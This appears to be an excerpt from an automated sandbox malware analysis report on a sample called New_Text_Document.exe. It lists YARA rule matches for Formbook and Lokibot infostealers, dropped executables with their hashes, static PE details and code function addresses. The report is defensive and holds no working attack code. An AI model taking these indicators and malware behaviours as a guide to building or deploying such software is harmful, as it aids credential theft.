                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000C.00000002.2535197131.000000000E498000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                    Source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: New_Text_Document.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: Process Memory Space: sbinzx.exe PID: 6748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: sbinzx.exe PID: 6356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: pznhcda.exe PID: 2692, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: pznhcda.exe PID: 6160, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: Process Memory Space: colorcpl.exe PID: 1792, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Loki Payload Author: kevoreilly
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\a\kung.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: New_Text_Document.exe
                    Source: 3.2.audiodgse.exe.3519970.5.raw.unpack, -Module-.csLarge array initialization: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E: array initializer size 5648
                    Source: New_Text_Document.exeStatic file information: Suspicious name
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: setup.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: 201.exe.0.drStatic PE information: section name:
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 3_2_022CD6FC3_2_022CD6FC
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 5_2_0270D55C5_2_0270D55C
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 5_2_06DD18E85_2_06DD18E8
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 5_2_06DD18D95_2_06DD18D9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040207B8_2_0040207B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004160F18_2_004160F1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004160F38_2_004160F3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004011448_2_00401144
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004011508_2_00401150
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004021058_2_00402105
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040FBC38_2_0040FBC3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00402BAA8_2_00402BAA
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00402BB08_2_00402BB0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040FBBA8_2_0040FBBA
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004024C88_2_004024C8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004024D08_2_004024D0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0042A4938_2_0042A493
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040FDE38_2_0040FDE3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0040DE638_2_0040DE63
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_00402F708_2_00402F70
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_004027A08_2_004027A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012601008_2_01260100
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130A1188_2_0130A118
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F81588_2_012F8158
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013241A28_2_013241A2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013301AA8_2_013301AA
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013281CC8_2_013281CC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013020008_2_01302000
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132A3528_2_0132A352
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013303E68_2_013303E6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127E3F08_2_0127E3F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013102748_2_01310274
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012F02C08_2_012F02C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012705358_2_01270535
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013305918_2_01330591
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013144208_2_01314420
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013224468_2_01322446
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131E4F68_2_0131E4F6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012707708_2_01270770
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012947508_2_01294750
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126C7C08_2_0126C7C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128C6E08_2_0128C6E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012869628_2_01286962
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012729A08_2_012729A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0133A9A68_2_0133A9A6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012728408_2_01272840
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127A8408_2_0127A840
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012568B88_2_012568B8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0129E8F08_2_0129E8F0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132AB408_2_0132AB40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01326BD78_2_01326BD7
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126EA808_2_0126EA80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127AD008_2_0127AD00
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130CD1F8_2_0130CD1F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01288DBF8_2_01288DBF
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0126ADE08_2_0126ADE0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270C008_2_01270C00
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01310CB58_2_01310CB5
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01260CF28_2_01260CF2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01312F308_2_01312F30
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012B2F288_2_012B2F28
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01290F308_2_01290F30
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E4F408_2_012E4F40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012EEFA08_2_012EEFA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127CFE08_2_0127CFE0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01262FC88_2_01262FC8
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132EE268_2_0132EE26
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01270E598_2_01270E59
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132CE938_2_0132CE93
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01282E908_2_01282E90
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132EEDB8_2_0132EEDB
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012A516C8_2_012A516C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125F1728_2_0125F172
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0133B16B8_2_0133B16B
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0127B1B08_2_0127B1B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132F0E08_2_0132F0E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013270E98_2_013270E9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012770C08_2_012770C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131F0CC8_2_0131F0CC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132132D8_2_0132132D
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0125D34C8_2_0125D34C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012B739A8_2_012B739A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012752A08_2_012752A0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013112ED8_2_013112ED
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128B2C08_2_0128B2C0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013275718_2_01327571
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130D5B08_2_0130D5B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013395C38_2_013395C3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132F43F8_2_0132F43F
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012614608_2_01261460
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132F7B08_2_0132F7B0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012B56308_2_012B5630
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013216CC8_2_013216CC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_013059108_2_01305910
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012799508_2_01279950
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128B9508_2_0128B950
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012DD8008_2_012DD800
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012738E08_2_012738E0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132FB768_2_0132FB76
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128FB808_2_0128FB80
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012ADBF98_2_012ADBF9
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E5BF08_2_012E5BF0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E3A6C8_2_012E3A6C
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01327A468_2_01327A46
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132FA498_2_0132FA49
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012B5AA08_2_012B5AA0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01311AA38_2_01311AA3
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0130DAAC8_2_0130DAAC
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0131DAC68_2_0131DAC6
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01327D738_2_01327D73
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01273D408_2_01273D40
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01321D5A8_2_01321D5A
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0128FDC08_2_0128FDC0
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_012E9C328_2_012E9C32
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132FCF28_2_0132FCF2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132FF098_2_0132FF09
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_0132FFB18_2_0132FFB1
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01271F928_2_01271F92
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01233FD28_2_01233FD2
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01233FD58_2_01233FD5
                    Source: C:\Users\user\Desktop\a\audiodgse.exeCode function: 8_2_01279EB08_2_01279EB0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041E0069_2_0041E006
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_004010309_2_00401030
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041D5639_2_0041D563
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_00402D879_2_00402D87
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_00402D909_2_00402D90
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_00409E509_2_00409E50
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_0041DE6A9_2_0041DE6A
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_00402FB09_2_00402FB0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B201009_2_01B20100
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B760009_2_01B76000
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3E3F09_2_01B3E3F0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BB02C09_2_01BB02C0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B865B29_2_01B865B2
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B865D09_2_01B865D0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B305359_2_01B30535
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B307709_2_01B30770
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B547509_2_01B54750
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B4C6E09_2_01B4C6E0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B469629_2_01B46962
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B688909_2_01B68890
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B168F19_2_01B168F1
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B228F09_2_01B228F0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B5E8F09_2_01B5E8F0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3A8409_2_01B3A840
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B2EA809_2_01B2EA80
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B32A459_2_01B32A45
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B48DBF9_2_01B48DBF
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B38DC09_2_01B38DC0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3AD009_2_01B3AD00
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3ED7A9_2_01B3ED7A
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B20CF29_2_01B20CF2
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B30C009_2_01B30C00
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BAEFA09_2_01BAEFA0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B22FC89_2_01B22FC8
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B50F309_2_01B50F30
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B72F289_2_01B72F28
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BA4F409_2_01BA4F40
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B42ED99_2_01B42ED9
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B30E599_2_01B30E59
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3B1B09_2_01B3B1B0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B1F1729_2_01B1F172
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B6516C9_2_01B6516C
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B333F39_2_01B333F3
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B352A09_2_01B352A0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B4D2F09_2_01B4D2F0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B334979_2_01B33497
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B774E09_2_01B774E0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B3B7309_2_01B3B730
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B359DA9_2_01B359DA
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B219799_2_01B21979
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B399509_2_01B39950
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B4B9509_2_01B4B950
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B338E09_2_01B338E0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B9D8009_2_01B9D800
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B4FB809_2_01B4FB80
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BA5BF09_2_01BA5BF0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B6DBF99_2_01B6DBF9
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BA3A6C9_2_01BA3A6C
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B4FDC09_2_01B4FDC0
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B33D409_2_01B33D40
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01BA9C329_2_01BA9C32
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B49C209_2_01B49C20
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B31F929_2_01B31F92
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 9_2_01B39EB09_2_01B39EB0
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B623212_2_094B6232
                    Source: C:\Windows\explorer.exeCode function: 12_2_094ADD0212_2_094ADD02
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B391212_2_094B3912
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B0B3212_2_094B0B32
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B0B3012_2_094B0B30
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B95CD12_2_094B95CD
                    Source: C:\Windows\explorer.exeCode function: 12_2_094B503612_2_094B5036
                    Source: C:\Windows\explorer.exeCode function: 12_2_094AC08212_2_094AC082
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E48023212_2_0E480232
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E47F03612_2_0E47F036
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E47608212_2_0E476082
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E477D0212_2_0E477D02
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E47D91212_2_0E47D912
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E47AB3212_2_0E47AB32
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E47AB3012_2_0E47AB30
                    Source: C:\Windows\explorer.exeCode function: 12_2_0E4835CD12_2_0E4835CD
                    Source: C:\Windows\explorer.exeCode function: 12_2_1044103612_2_10441036
                    Source: C:\Windows\explorer.exeCode function: 12_2_1043808212_2_10438082
                    Source: C:\Windows\explorer.exeCode function: 12_2_10439D0212_2_10439D02
                    Source: C:\Windows\explorer.exeCode function: 12_2_1043F91212_2_1043F912
                    Source: C:\Windows\explorer.exeCode function: 12_2_104455CD12_2_104455CD
                    Source: C:\Windows\explorer.exeCode function: 12_2_1044223212_2_10442232
                    Source: C:\Windows\explorer.exeCode function: 12_2_1043CB3212_2_1043CB32
                    Source: C:\Windows\explorer.exeCode function: 12_2_1043CB3012_2_1043CB30
                    Source: C:\Windows\explorer.exeCode function: 12_2_1082008212_2_10820082
                    Source: C:\Windows\explorer.exeCode function: 12_2_1082903612_2_10829036
                    Source: C:\Windows\explorer.exeCode function: 12_2_1082D5CD12_2_1082D5CD
                    Source: C:\Windows\explorer.exeCode function: 12_2_10821D0212_2_10821D02
                    Source: C:\Windows\explorer.exeCode function: 12_2_1082791212_2_10827912
                    Source: C:\Windows\explorer.exeCode function: 12_2_1082A23212_2_1082A232
                    Source: C:\Windows\explorer.exeCode function: 12_2_10824B3212_2_10824B32
                    Source: C:\Windows\explorer.exeCode function: 12_2_10824B3012_2_10824B30
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: setup.exe.0.drStatic PE information: Number of sections : 17 > 10
                    Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe 5337415A9069931BB4B3C68559D2ED226AFA5E64E9D66165D6A9F65400F259D9
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\pznhcda.exe 55A96D9729DA08198D041DBC860AB75C08A1B2004AEA757CADF526CDC128818D
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\a\audiodgse.exe 037500EBA0044C05416217EA9936C6B9F4D9EE9A0A05D2D7860245FFFDD347B6
                    Source: smss.exe.0.drStatic PE information: Data appended to the last section found
                    Source: New_Text_Document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: dump.pcap, type: PCAPMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
